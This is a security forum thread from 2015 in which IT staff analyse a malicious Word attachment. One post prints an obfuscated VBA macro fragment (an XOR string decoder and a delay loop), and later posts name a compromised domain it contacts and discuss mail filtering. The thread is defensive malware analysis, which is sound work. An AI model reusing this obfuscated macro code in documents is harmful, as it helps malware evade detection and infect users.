Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

New VBA trojan?


  • Please log in to reply
20 replies to this topic

#1 JohnnyJammer

JohnnyJammer

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 05:22 PM

I have got a few of these emails to a end user at work today.

They appears to be word .doc files with VBA trojans.

I unziped the word document and some of the functions appear to be as follows (Im assuming it was to use the buffer overflow in the ReDim array?)

 

AywrVYyn6PU8e = 86
OJwHPvvkNBx
Qa8n = 30
Else
KRVvrFzLxkP = 12
LHJwPn
VuxW4RviE = 2
End If
Else
AywuIoq8E = 24
LHJwPn
QY89oxaGRhUDwYw = 17
End If
C359eVaPxY = 58
Else
VuwAfv5FWQ = 28
LHJwPn
QUt = 88
End If
I993Iemo = 24
End Sub
Function Np9d4Sq1ms(ByVal S55DXTA3D7Tg As String, TjaTJVDNlOls4K As String) As String
PYLdSL = 61
On Error Resume Next
UUUsxv = 56
Dim YYcrmHOr6p8() As Byte, Llll3kaEPCtrC(0 To 285) As Integer, IH0ipwfjMLToiiMP() As Byte, X0IbZjw3ZrcqO1W, CGwtlD1j6g, MxT4Xhkm4DFNF1, Qb7Gf5L3T, RrqY8Ea2pxa As Boolean
Q4jBuBNj = 69
YYcrmHOr6p8 = StrConv(S55DXTA3D7Tg, (64 + 5 + 64 - 5))
BFFXuVGJN40 = 54
IH0ipwfjMLToiiMP() = StrConv(TjaTJVDNlOls4K, (64 + 7 + 64 - 7))
ALbkkp7e1St = 20
CGwtlD1j6g = UBound(IH0ipwfjMLToiiMP)
ITjFVBmH40hkGvi = 5
For X0IbZjw3ZrcqO1W = 0 To (127.5 + 1 + 127.5 - 1)
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W) = X0IbZjw3ZrcqO1W
Next X0IbZjw3ZrcqO1W
For X0IbZjw3ZrcqO1W = (128 + 1 + 128 - 1) To (142.5 + 1 + 142.5 - 1)
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W) = X0IbZjw3ZrcqO1W Xor (128 + 2 + 128 - 2)
Next X0IbZjw3ZrcqO1W
For X0IbZjw3ZrcqO1W = 1 To (3 + 9 + 3 - 9)
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W + (124.5 + 7 + 124.5 - 7)) = IH0ipwfjMLToiiMP(CGwtlD1j6g - X0IbZjw3ZrcqO1W)
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W - 1) = IH0ipwfjMLToiiMP(X0IbZjw3ZrcqO1W - 1) Xor ((127.5 + 5 + 127.5 - 5) - IH0ipwfjMLToiiMP(CGwtlD1j6g - X0IbZjw3ZrcqO1W))
Next X0IbZjw3ZrcqO1W
RrqY8Ea2pxa = False
MxT4Xhkm4DFNF1 = 0
Qb7Gf5L3T = 0
For X0IbZjw3ZrcqO1W = 0 To UBound(YYcrmHOr6p8)
If MxT4Xhkm4DFNF1 > CGwtlD1j6g Then MxT4Xhkm4DFNF1 = 0
If Qb7Gf5L3T > (142.5 + 8 + 142.5 - 8) And RrqY8Ea2pxa = False Then Qb7Gf5L3T = 0: RrqY8Ea2pxa = Not (RrqY8Ea2pxa)
If Qb7Gf5L3T > (142.5 + 8 + 142.5 - 8) And RrqY8Ea2pxa = True Then Qb7Gf5L3T = (2.5 + 1 + 2.5 - 1): RrqY8Ea2pxa = Not (RrqY8Ea2pxa)
YYcrmHOr6p8(X0IbZjw3ZrcqO1W) = (YYcrmHOr6p8(X0IbZjw3ZrcqO1W) Xor (Llll3kaEPCtrC(Qb7Gf5L3T) Xor IH0ipwfjMLToiiMP(MxT4Xhkm4DFNF1)))
MxT4Xhkm4DFNF1 = MxT4Xhkm4DFNF1 + 1
Qb7Gf5L3T = Qb7Gf5L3T + 1
Next X0IbZjw3ZrcqO1W
R2OBryMQJGjs = 19
Np9d4Sq1ms = StrConv(YYcrmHOr6p8(), (32 + 6 + 32 - 6))
PexIcSt3 = 76
End Function
Sub GBYGgwyBbLw8ZglD(Phl As Long)
ANQYYlB45stwz = 85
Dim L8cH8X1TdWk As Long
Y5K93pkg = 86
L8cH8X1TdWk = Timer + Phl
Do While Timer < L8cH8X1TdWk
DoEvents
Loop
Lgs54WPK30VtF4 = 94
End Sub

 

I could upload a sample if anyone is keen because virustotal only one AV picked it up as a VBA trojan, the rest appear to class it as clean.



BC AdBot (Login to Remove)

 


#2 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 05:46 PM

Just did another scan

https://malwr.com/analysis/MTVkMWY1MDQ2MTU0NGQ1YjhmYWVhNWEwYzNjMGNkZWI/

Another result

https://www.hybrid-analysis.com/sample/365a04140b3abe71c6cb4248d5bbbb57a172f37fe878eec49dc90745f5c37ae3?environmentId=2

 

Nasty little sucker hey!


Edited by JohnnyJammer, 16 December 2015 - 05:54 PM.


#3 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:37 AM

Posted 16 December 2015 - 05:48 PM

Mind uploading the sample on Hybrid-Analysis and share the report URL here? I prefer it to malwr :P

https://www.hybrid-analysis.com/

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#4 technonymous

technonymous

  • Members
  • 2,520 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:37 AM

Posted 16 December 2015 - 05:54 PM

Be careful with that. Probably a ransomware. Look at the end "Do While Timer" & "DOEvents" "Loop"



#5 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 06:00 PM

Mind uploading the sample on Hybrid-Analysis and share the report URL here? I prefer it to malwr :P

https://www.hybrid-analysis.com/

Edited last post

 

yeh techy, we use messagelabs and normally its pretty good but this was targeted at one user only.

 

yeh well if they are using On error Resume Next and Do Events in VBA, then i assume they couldn't be bothered with error handling LOL.



#6 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:37 AM

Posted 16 December 2015 - 06:02 PM

We have a huge wave of them in the last month or so here mate, 10-20 new instances per week.

 

We've tightened the screws on our macro policies... not much else to do at this stage I guess shrug.gif



#7 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 06:03 PM

Also it connects to a defaced site.

https://sitecheck.sucuri.net/results/minnesotafoodreview.com

(<meta name="Keywords" content="Hacked by United Islamic Cyber Force">)


We have a huge wave of them in the last month or so here mate, 10-20 new instances per week.

 

We've tightened the screws on our macro policies... not much else to do at this stage I guess shrug.gif

Yeh as you would know they have been targeting Business's up the QLD coast, we coped it a few weeks back as well and i was getting around 30-40 reports a day!.


Edited by JohnnyJammer, 16 December 2015 - 06:04 PM.


#8 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:37 AM

Posted 16 December 2015 - 06:10 PM

Our mail scanner isn't deleting any of them either, so the desktop AV's (when they finally wise up to the sigs) can't delete them off the IMAP server, though they can see them... Which is leaving me with orange flashing lights on a mob of machines every day that need individual attention to turn off.

 

Spent most of yesterday looking for a solution to this to no avail. My analyst and I have decided we're going to block all .doc and .xlsx.... or perhaps external mail as a whole. :lmao:



#9 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 06:17 PM

LOL, so you guys dont use external filters? MessageLabs is great so far and the price isnt to bad either mate.



#10 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:37 AM

Posted 16 December 2015 - 06:27 PM

Wet tropics mate... making anything cloud based is a bad idea, especially when our downtime tolerance is 0.

 

Considering a rack mount type affair like the Barracuda.



#11 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 06:31 PM

Yeh our downtime is zero as well but thats just unrealistic no matter what previsions you have in place.

if you use symantec Vault you can download the emails from there as well, if we have an outage all our mail pools up in the cloud untill a connection to the mailserver can be made and then it starts trickling back in.

Anyway i have submitted that file to our AV client and also a few others.



#12 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:37 AM

Posted 16 December 2015 - 06:56 PM

Being in an industrial situation we start bleeding money if we stop, so it shouldn't be too hard to get "them" to pony up the cash for something decent on site. We lost 12 minutes last year... none this year (so far, touch wood) :)

 

Keep up the good fight Johnny.



#13 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 16 December 2015 - 09:09 PM

Looks similar to this post

http://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/



#14 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:37 AM

Posted 16 December 2015 - 09:55 PM

Yeah and a lot of these recently too, in the same vein.

 

https://www.virustotal.com/en/file/96a1cc638a0beecce0fd3ada82901009993d0ef5f76dac4e6ccf30ce2d3bc8ea/analysis/1450320811/

 

A few days ago when I received the file it was FUD.



#15 JohnnyJammer

JohnnyJammer
  • Topic Starter

  • Members
  • 1,122 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:QLD Australia
  • Local time:02:37 AM

Posted 17 December 2015 - 04:34 PM

Well i submitted it to webroot, symantec, eset and kaspersky and they all replied accept webroot LOL.

All accepted it was a new threat as well.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users